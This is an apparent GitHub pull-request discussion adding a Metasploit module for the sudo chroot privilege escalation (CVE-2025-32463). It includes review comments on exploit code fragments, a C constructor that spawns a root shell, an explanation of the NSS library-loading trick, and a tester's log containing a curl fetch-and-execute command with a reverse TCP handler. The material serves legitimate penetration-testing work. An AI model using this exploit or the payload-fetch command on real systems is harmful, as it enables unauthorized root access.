Adds module for sudo chroot LPE (CVE-2025-32463) #20376
Conversation
msutovsky-r7
force-pushed
the
exploit/sudo-chroot-privesc
branch
from
a9a701f to
d50644f
Compare
msutovsky-r7
force-pushed
the
exploit/sudo-chroot-privesc
branch
from
d50644f to
14fb001
Compare
msutovsky-r7
changed the title
|
|
||
| return CheckCode::Safe if !file?('/etc/nsswitch.conf') | ||
|
|
||
| sudo_version.gsub!(/p/, '.') |
There was a problem hiding this comment.
It would be nice to have a comment here to explain what's going on :)
| 'Notes' => { | ||
| 'Stability' => [CRASH_SAFE], | ||
| 'Reliability' => [REPEATABLE_SESSION], | ||
| 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] |
There was a problem hiding this comment.
What kind of things are logged?
There was a problem hiding this comment.
AFAIK, you can add setting to sudo that will save a log every time you run it along with arguments.
There was a problem hiding this comment.
But this isn't the default behaviour, so I don't think we should have IOC_IN_LOGS
|
|
||
| cd(temp_dir) | ||
|
|
||
| cmd_exec("mkdir -p #{base_dir}/etc libnss_") |
There was a problem hiding this comment.
| cmd_exec("mkdir -p #{base_dir}/etc libnss_") | |
| mkdir("#{base_dir}/etc libnss_") |
Metasploit's (remote) mkdir behaves like mkdir -p.
| execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL); /* root shell */ | ||
| }> | ||
|
|
||
| upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}") |
There was a problem hiding this comment.
Is there any context on why we need to upload and compile our own payload here, I think there's existing payload prepend flags in framework for uid/gid setting - or was chdir the hard-blocker here 👀
There was a problem hiding this comment.
IIRC, the payload needs to chdir to exit from chroot. That being said, I think the bigger blocker might be the fact that payload needs to act as , the constructor for some reason, so I preferred to compile things on fly. libnss.so library, so for that reasonBut I'll do some tests, see if it might work without compiling anything. After some tests, it seems like generate_payload_dll does not do the trick, because the payload needs to run before main (?), so whatever we want to run, it should be run as init - __attribute__((constructor)). I haven't come across such options for metasploit payload, so I left it as it is.
| ## Vulnerable Application | ||
|
|
||
|
|
||
| Sudo before version 1.19.17p1 allows user to use `chroot` option, when executing command. The option is intended to run a command with user-selected root directory (if sudoers file allow it). Change in version 1.9.14 allows resolving paths via `chroot` using user-specified root directory when sudoers is still evaluating. This allows the attacker to trick Sudo into loading arbitrary shared object. As target shared object, Name Service Switch (NSS) operations are trigged before resolving sudoers, but after running `chroot` syscall. The module requires existing session and requires compiler on target machine (e.g. `gcc`). |
There was a problem hiding this comment.
Might be worthwhile to explicitly state versions 1.9.14-1.9.17p1 are vulnerable in the first sentence. No one wants to dig to find the second bookend. Ain't nobody got time for that(TM).
| require 'pry' | ||
| require 'pry-byebug' |
There was a problem hiding this comment.
to be removed
msutovsky-r7
force-pushed
the
exploit/sudo-chroot-privesc
branch
from
cd6167a to
8c43583
Compare
|
This does work on Kali when the sudo binary is already correct.... |
|
No luck on Fedora: msf exploit(linux/local/sudo_chroot_cve_2025_32463) > sudo --version # the sessions is running on the host
[*] exec: sudo --version
Sudo version 1.9.15p5
Sudoers policy plugin version 1.9.15p5
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.15p5
Sudoers audit plugin version 1.9.15p5
msf exploit(linux/local/sudo_chroot_cve_2025_32463) > run verbose=true
[*] Command to run on remote host: curl -so ./AiXJoHSe http://10.174.61.240:8080/GNhwwOeRAMQbHo7tI0ZdVw;chmod +x ./AiXJoHSe;./AiXJoHSe&
[*] Fetch handler listening on 10.174.61.240:8080
[*] HTTP server started
[*] Adding resource /GNhwwOeRAMQbHo7tI0ZdVw
[*] Started reverse TCP handler on 10.174.61.240:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] run: Interrupted
msf exploit(linux/local/sudo_chroot_cve_2025_32463) > set AutoCheck false
AutoCheck => false
msf exploit(linux/local/sudo_chroot_cve_2025_32463) > run verbose=true
[*] Command to run on remote host: curl -so ./ssqQgeqjXkHk http://10.174.61.240:8080/GNhwwOeRAMQbHo7tI0ZdVw;chmod +x ./ssqQgeqjXkHk;./ssqQgeqjXkHk&
[*] Fetch handler listening on 10.174.61.240:8080
[*] HTTP server started
[*] Adding resource /GNhwwOeRAMQbHo7tI0ZdVw
[*] Started reverse TCP handler on 10.174.61.240:4444
[!] AutoCheck is disabled, proceeding with exploitation
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] run: Interrupted
msf exploit(linux/local/sudo_chroot_cve_2025_32463) > |
|
@jvoisin did you change the installed version of sudo? It does not work for me on Ubuntu if I install a downgraded sudo, but it does on Kali which comes with the vulnerable version. I've also noticed inconsistencies in the version on the host when I downgrade: |
|
I didn't downgrade, I never updated it (precisely because I'm lazy and wanted to test this module), it's still The module shouldn't timeout nonetheless :P |
This PR adds a local module for CVE-2025-32463 - local privilege escalation in sudo before version 1.9.17p1. The module requires existing session and ability to compile C payload on the target machine.
Installation
Dockerfile:docker build -t sudo-chroot .docker run -it --rm --privileged sudo-chrootVerification Steps
use linux/local/sudo_chroot_cve_2025_32463set lhost [attacker IP address]set lport [attacker port]runOptions
COMPILE
Option setting if compile target payload on the target.
COMPILER
Option setting the compiler to compile target payload.
Scenarios